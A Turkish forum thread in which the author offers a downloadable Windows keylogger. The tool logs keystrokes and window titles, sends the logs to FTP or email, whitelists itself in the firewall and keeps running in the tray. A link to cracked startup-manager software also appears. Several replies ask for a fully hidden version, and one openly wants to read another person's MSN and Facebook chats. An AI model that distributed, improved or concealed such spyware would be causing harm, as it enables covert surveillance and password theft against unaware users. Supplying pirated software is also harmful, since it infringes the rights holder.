Tnctr Keylogger V2.5

[mustafa_x]

@wmismail'in keylogger uygulamasını biraz geliştirdim. Uygulamanın bu sürümü pencere başlıklarını da (tarih & saat bilgisiyle birlikte) kaydediyor, tüm harfleri ve diğer karakterleri doğru olarak aktarıyor (Türkçe Q klavyeye göre yazıldı) ve istenirse FTP veya e-posta hesabına gönderme seçeneği de var. Tabii ki hesap ayarları kaydedilebiliyor. (O anki oturumu açık olan kullanıcı için kayıt defterine kaydediliyor. Yalnız kaydetme sırasında şifreleme kullanılmıyor.)

 

Yerel kayıt dosyası geçici dizininize (Bilgisayarım penceresinde adres çubuğuna %temp% yazıp enter'ladığınızda açılan klasör) "Tuş Kayıtları.txt" adıyla kaydediliyor, değiştirme seçeneği eklemedim. FTP'ye kayıt gönderirken oturumu açık kullanıcının adı, makine adı ve tarih & saat bilgileri kullanılıyor, "Mustafa@CIHAZ (15.06.2011 18.44.27).log" gibi bir uzak dosya adı elde ediliyor; e-posta adresine gönderilirken de "TNCKL Kayıtları (15.12.2012 00:32:27)" gibi bir başlıkla direkt (eklenti olarak değil) kayıtlar gönderiliyor. Hesaba kaç dakikada bir kayıt gönderileceği ve etkin / devredışı ayarı da var tabii, gönderim aralığı 1 ile 1440 dakika (1440 dk. = 1 gün) arasında değiştirilebiliyor.

 

Uygulamaya Windows Güvenlik Duvarı'na kendisini güvenilen uygulama olarak tanıtması için gerekli kodu ekledim. O yüzden gönderim öncesi en azından Windows izin istemeyecektir.

 

Hesap ayarları kendi sekmesinde Kaydet'e tıklandığında, gönderimin etkin / devredışı olması ve gönderim aralığı da değiştirildiği an kaydediliyor.

 

Uygulamanın sağ üstündeki çarpı tuşuna tıkladığınızda pencere kapanıyor ama uygulama sistem çubuğuna (görev çubuğunda saatin yanındaki alan) simge açıp çalışmaya devam ediyor. (Simgeye yazı ve sağ tık menüsü eklemedim.) Bu simgeye çift tıkladığınızda uygulama penceresi geri geliyor, isterseniz pencerenin geri gelmesi öncesi parola sordurabilirsiniz. Uygulamadan tamamen çıkmak için sağ alttaki "Çıkış" tuşunu kullanabilirsiniz.

 

Uygulama, açılışta (varsa) önceki kayıt dosyasını okuyor, hafıza kaydının başlangıcına bu kaydı ekleyerek yeni kayda başlıyor ve 2 dakikada bir dosya kaydı güncelleniyor. Uygulama açıkken dosya silinse bile hafıza kopyası üzerinden dosya yeniden oluşturuluyor. Kısacası, uygulama açık olduğu sürece kayıt önceki kaldığı yerden devam ediyor.

 

FTP'ye dosya veya e-posta hesabına kayıt gönderimi başarılı olursa gönderim sonrası gönderilmiş kayıt siliniyor.

 

(Hesap Ayarları penceresinde parola alanlarına maskeleme eklemedim, her karakterin * şeklinde görünmesine gerek yoktu bence.)

 

 

 

Önceki sürüme (v2.0) ait resimler:

 

http://www.tnctr.com/uploads/imgs/pre_1335968083__1.jpg

 

http://www.tnctr.com/uploads/imgs/pre_1335968151__2.jpg

(Bu resimdeki funpic.de'den aldığım hesap genelde çalışmıyor artık.)

 

 

 

Şu anki sürüme (v2.5) ait resimler (kendi bilgisayarımdan yayınlıyorum, bağlantı sorunum olursa görünmeyebilir):

 

 

 

 

 

 

[İşim gereği kullandığım cihazın (MacBook) klavyesinde Türkçe karakterler olmadığı ve harici klavye bağlamak da istemediğim için Türkçe karakterleri yazmamda yardımcı olacak bi' KeyMapper uygulaması çalışıyor cihazımda, bu uygulama ile aynı tuş takip API'lerini kullandığı için (onu da kendim yazdım) çakışma oluyor, onu sonlandırıp bunda klavye kaydı alamadım(, aslında üşendim). Normalde önceki iki resimden ilkinde olduğu gibi (sonunu bulanıklaştırdığım satır) yazılanlar köşeli parantezli satırların hemen alt satırından itibaren ekleniyor.]

 

 

 

İndirme linki:

 

http://mstfx.no-ip.org/index.php?tamyol=Programlar/Kendi%20Yap%FDm%FDm%20Olanlar/TNCTR%20KeyLogger%20v2.exe

 

(Funpic.org da funpic.de gibi artık çalışmadığından (genelde "Restricted Stuff" hatası alınıyor) (diğer kendi yapımım olan seçme uygulamalar gibi bunu da) kendi bilgisayarımdan paylaşıma açtım. Dosya paylaşım sitelerine pek güvenemiyorum, zaten cihazım sürekli açık.)

 

 

 

WinXP kullanıcıları için not: Bu uygulamanın çalışması için bilgisayarınızda .NET Framework 2.0'ın kurulu olması gerekiyor.

 

Windows 8 kullanıcıları için not: Sisteminizde .NET Framework 2.0 etkin değilse elle açmanız gerekiyor. ("Program Kaldır/Değiştir"deki "Windows özelliklerini aç veya kapat" penceresi üzerinden etkinleştirilebiliyor.)

 

 

Cihazının RAM'i (oldukça) düşük kullanıcılar için not: Yerel kayıt dosyası çok büyüyünce (8 - 10 MB gibi) uygulamanın RAM kullanımı (sürekli 5 MB ile dosya boyutunun yaklaşık 10 katı arasında inip çıkıyor) sorun olabilir, gerekirse arada bir uygulamadan çıkıp tuş kayıtları dosyasını silin.

 

 

 

 

Önemli Not: Uygulamayı şifre çalma gibi kötü amaçlarla kullanmanız durumunda sorumluluk tamamen size ait. Ben bunu sadece kendi bilgisayarımda kullanıyorum, o da yazdığım metin belgelerinin kaydedilmeden kapanması durumunda uğraşımın boşa gitmesini önlemek için.

Edited December 15, 2012 by mustafa_x

[mustafa_x]

Kısa bi süre önce funpic.org'a http'den erişimin engellenmiş olduğunu öğrendim (ftp'den girilebiliyo) ve uygulamayı kendi bilgisayarımdan da paylaşıma açıp linki ekledim.

[emre85]

herşey güzel elinize sağlıkta programı gizleme şansımız yokmu açık olmaz yanı ?????

[mustafa_x]

[quote name='emre85' date='02 May 2012 - 17:35 ' timestamp='1335972958' post='1195522']
herşey güzel elinize sağlıkta programı gizleme şansımız yokmu açık olmaz yani ?????
[/quote]


Uygulama penceresi (sağ üst X tuşundan) kapatıldığında sistem çubuğundaki simge haricinde gizleniyo zaten, kötü amaçlı kullanım ihtimaline karşı tamamen gizleme eklemedim.

[lavigne-61]

başarılarının devamını dilerim hangi dille yaptın acaba ?

[hanzo03]

FTP olayını nasıl halledicez peki

[mustafa_x]

[quote name='lavigne-61' date='02 May 2012 - 18:14 ' timestamp='1335975260' post='1195537']
başarılarının devamını dilerim hangi dille yaptın acaba ?
[/quote]

Sağol. C# (Microsoft Visual C# 2005 Express Edition) kullandım. Aslında kodlar Visual Basic 6'da yazılmış olarak geçmişti elime ama VB6'da timer bazen kilitleniyodu, o yüzden C#'a aktardım.



[quote name='hanzo03' date='02 May 2012 - 18:56 ' timestamp='1335977786' post='1195555']
FTP olayını nasıl halledicez peki
[/quote]

2009 başlarında bi FTP sitesi gerekmişti (imzamda link verdiğim dosya paylaşım sayfam için), biraz araştırma sonrası funpic.org'dan üyelik almıştım, ama şu an tam hatırlamıyorum üyeliği nasıl aldığımı, biraz uğraştırmıştı.

Bu konuyu iki ay kadar önce açmıştım [ama konu üste çıkmamıştı, ilgili admin iki hafta kadar önce linkin (o sırada sadece funpic.org linki vardı, artık TTNET ADSL'den açılmıyomuş, bi operatörün 3G modemiyle açılıyo, herhalde ADSL'de otomatik başlamış olan güvenli internet uygulaması sorun oldu) çalışmadığını belirten bi bildirim gönderdiğinde bu konunun açılmış (admin onayıyla görünür hale gelmiş) olduğunu öğrendim], o sıralar boştaydım, şimdi iş yoğunluğu sebebiyle konuyla ilgilenemiyorum. Tnc IP2Mail uygulamasını bulup indirdim, kaynak kodlarını incelediğimde (exe'yi decompile ederek kaynak kodlarını aldım) olursa e-posta gönderme özelliği eklemeyi düşünüyorum, istersen onu bekle (tahminen bir hafta daha yoğun olucam).

[*TOYGAR*]

Kaynak kodlarını paylaşmanızı istesem ?

[dumansizalev]

lazım bişeydi

[dispatcher]

Msn ve facebook yazışmalarını kaydedebiliyormu?Sadece bu olsa bir de gizlenebilse bana yeter,yanlış anlamayın bir hayırsızın ağına düştük;ona kendisinin ne olduğunu isbat edebilmek için bu programa çok ihtiyacım var.
Başarılar.

[theyureklicocuk]

bunu böle msn ye mail gonderen sekilde yapamaz mıyız?

[mustafa_x]

bunu böle msn ye mail gonderen sekilde yapamaz mıyız?

 

 

Sonunda vakit bulup uygulamayı güncelledim. Artık e-posta hesabına da kayıt gönderilebiliyor.

 

 

(Bir buçuk saattir konuyu güncellemeye uğraşıyorum, en az üç kez konu yerine html kodlu hali geldi, kodlu konu metnini web sayfası olarak kaydedip sayfayı tarayıcıda açıp yazıyı alarak tekrar biçimlendirdim. Eskisi gibi bbcode'ları elle yazmak istiyorum; ne biçimlendirme, ne de img tag'ları görünmüyor, sonunda uğraşıp bi' metin belgesine bbcode'ları dahil yedeğini aldım konunun. Kendi yazdığım web sayfamın ilk halinde bile bu kadar sorunla karşılaşmamıştım :@ . Konunun şu anki hali azmin zaferi bile diyebilirim yani.)

[masterbaba]

başlangıçta çalıştır özelliği olsa çok güzel olurdu.her yeniden başlattığımızda programı tekrar aç.zor iş.:D

[BPlC0nNecti0n]

kardeş içinde keylogger yok dimi ? :D

[masterbaba]

bütün antivirüslerde denedim sadece avira  TR/Spy.Gen8 diye bir şey buldu.

[mustafa_x]

başlangıçta çalıştır özelliği olsa çok güzel olurdu.her yeniden başlattığımızda programı tekrar aç.zor iş.

 

 

Başlangıca uygulama eklemek hangi başlangıç yöntemini kullanırsak kullanalım Kullanıcı Hesap Denetimi'ne takılıyor. Elle eklemek istersen Startup Defender (antivirüs yerine kullandığım ve yeterli gördüğüm  bi' program) ile yapılabiliyor mesela. Orijinal kurulum dosyasını ve crack'ini tek dosya yaptım (biraz aceleyle paketledim, yarı katılımsız) : http://mstfx.no-ip.org/index.php?tamyol=Programlar/Kat%FDl%FDms%FDz%20Kurulumlar/Startup%20Defender%20-%20Tek%20Dosya.exe, penceresinin üst menüsünde soldan dördüncü tuş ("Add Entry" tuşu) bu işi görüyor. 

 

 

 

avast free de yakalıyor keklenmiyek

 

 

Yeni sağ tık eklentileri ararken @wmismail'in (ki bu konuyu da aslında o başlatmıştı) bi' gönderisine rast geldim: "Bu NOD'la Avast'ı ortadan kaldırmak lazım. Onlar için herşey virüs.." Adam haklı...

 

E-posta gönderme özelliğini saymazsak bir şey bulunamaz bunda, gayet de normal bi şekilde Windows'un tuş izleme API'lerini kullanıyor bu, ki mesela klavye kasayollarını kodla algılamanın bildiğim tek yolu bu. Demek ki NOD32 ya da Avast kullansam MP3 Küçültücü uygulamamı (paylaşmıştım) da engelleyecek bu antivirüsler, klavye kısayolları kontrolünü bu şekilde yapmıştım çünkü... Sırf bu yüzden antivirüs kullanmıyorum.

 

Uygulamayı trojan olarak kullanılsın diye hazırlamadığım için antivirüs kontrolü yaptırmak da hiç aklıma gelmemişti bu arada. Neyse...

 

 

Ekleme: Google Chrome'da bu iletiyi yazarken, mecburen (işim gereği) kullandığım MacBook'un aşırı hassas + dengesiz touchpad'i ne zaman yazma alanı dışına tıkladıysa artık, yalnış yazdığım bir harfi sileyim derken (backspace tuşuna bastığımda) önceki sayfaya gitti tarayıcı, ki " antivirüs kullanmıyorum."unu da yazıp gönderecektim bu iletiyi. Normalde olmaz ya, şimdi lazım oldu keylogger kayıtları. İyi ki KeyMapper (İngilizce Q klavyede Türkçe harf basabilmek için yardımcı program) uygulamama keylogger da gömdüm, yoksa bi daha bu kadar geniş yazmaya uğraşamazdım.

 

_________________________________________________________________

 

Daha göndermeden Edit: Forumda (burada) BBCode'lar yerine görüntüyü gösteren, kodları gizlediği için doğru kopyalamaya da izin vermeyen yeni yapı herhalde benim sinirlerimin sağlamlığını (gerilebilirlik üst sınırını) ölçmek için yapılmış. :@ Bilen biri varsa en azından (kopyalamaktan geçtim, sıfırdan elle yazılmış) bbcode'lu metni nasıl gönderebileceğimi söylesin, bu gidişle yakında yazacağım MP3 Küçültücü v4 ve Toplu Kurulum v7 uygulamalarının konularını güncellemekten vazgeçeceğim. Dün bu konuyu, bugün de Sağ Tık Eklentileri konumu güncellemek toplam 2 günümü (toplam 14 saat kadar) aldı, site ("Sağ Tık Eklentileri" konumda son mesaja yazmıştım durumu) yine konu metnini bozabilir diye bbcode'lu metin yedeğini alıyorum konuların, en azından bazen çalışıyor etiketler. Ayarlar'a falan baktım ama bulamadım eski konu/mesaj editörüne nasıl ulaşabileceğimi.

 

 

Gönderdikten sonra Edit: Alıntı yaparken kopyalama da başarısız oldu, quote etiketlerini elle yazdım, yalnış işlendi. Onları (alıntı kutularını) düzelttim.

Edited December 16, 2012 by mustafa_x

[asmazh]

Ricam şudur ki, böyle programlar yazıp çocukların eline vermeyin! Bunu söylememde binlerce sebep var. Yoksa biz bilmiyor muyuz tam teşekküllü bir keylogger yazıp da dağıtmayı... Emek hırsızlığı diz boyu. Ayrıca elinde böyle programlar bulunan herkes kendini hacker sanıyor, ülke hackerdan geçilmiyor...

[v4patron]

Asmazh kardeşim özellikle kötüye kullanım olmaması için adam tam gizlee seçeneği eklememiş yani çoluk çocuk bişey yapamaz bu programla paylaşım için teşekkürler bu arada...

[VURGUNVRO]

Kardesim bi gizleme koysanda super olur bana acil lazim simdiden tesekkurlerimi bildiriyorum

[IIMyErenII]

Linki güncelleyebilirmisiniz ?

[EnesAhmet]

simge durumundayken gizleme seçeneği olsa güzel olurdu